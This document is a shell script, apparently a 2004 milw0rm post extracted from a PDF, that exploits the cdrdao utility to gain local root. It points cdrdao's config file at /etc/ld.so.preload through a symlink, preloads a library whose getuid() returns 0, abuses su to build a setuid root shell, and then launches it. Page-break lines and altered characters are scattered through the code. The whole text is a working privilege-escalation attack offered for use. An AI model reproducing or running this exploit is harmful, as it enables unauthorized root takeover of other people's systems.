1 #!/bin/sh
2 DIR=‘pwd‘
3 echo ""
4 echo "cdrdao local root exploit − gr doesn’t protect you this time"
5 echo "Karol Wiêsek <appelast*drumnbass.art.pl>"
6 echo ""
7 sleep 2
8 umask 000
9 echo −n "[*] Checking if /etc/ld.so.preload doesn’t exist ... "
10 if [ −f /etc/ld.so.preload ]; then
11 echo "WRONG"
12 echo "/etc/ld.so.preload exists, write another exploit ;P"
13 exit
14 else
15 echo "OK"
16 fi
17 echo −n "[*] Checking if su is setuid ... "
18 if [ −u /bin/su ];then
19 echo "OK"
20 else
21 echo "WRONG"
22 exit
23 fi
24 echo −n "[*] Creating evil *uid() library ... "
25 cat > getuid_lib.c << _EOF
26 int getuid(void) {
27 return 0; }
28 _EOF
29 gcc −o getuid_lib.o −c getuid_lib.c
30 ld −shared −o getuid_lib.so getuid_lib.o
31 rm −f getuid_lib.c getuid_lib.o
32 if [ −f ./getuid_lib.so ]; then
33 echo "OK"
34 else
35 echo "WRONG"
36 fi
37 echo −n "[*] Creating suidshell ... "
38 cat > suid.c << _EOF
39 int main(void) {
40 setgid(0); setuid(0);
41 unlink("./suid");
42 execl("/bin/sh","sh",0); }
43 _EOF
44 gcc −o suid suid.c
45 rm −f suid.c
46 if [ −x ./suid ];then
47 echo "OK"
48 else
49 echo "WRONG"
50 exit
51 fi
52 echo −n "[*] Exploiting cdrdao ... "
Page 1/2
CDRDAO Local Root Exploit
Karol Wiêsek
09/07/2004
53 ln −sf /etc/ld.so.preload $HOME/.cdrdao
54 if [ ! −L $HOME/.cdrdao ];then
55 echo "Could’n link to \$HOME/.cdrdao"
56 exit
57 fi
58 cdrdao unlock −−save 2>/dev/null
59 >/etc/ld.so.preload
60 echo "$DIR/getuid_lib.so" > /etc/ld.so.preload
61 su − −c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"
62 if [ −s ./suid ];then
63 echo "OK"
64 else
65 echo "WRONG"
66 exit
67 fi
68 rm −f getuid_lib.so
69 unlink $HOME/.cdrdao
70 echo "Entering rootshell ... ;]"
71 ./suid
72
73 # milw0rm.com [2004−09−07]
Page 2/2
CDRDAO Local Root Exploit
Karol Wiêsek
09/07/2004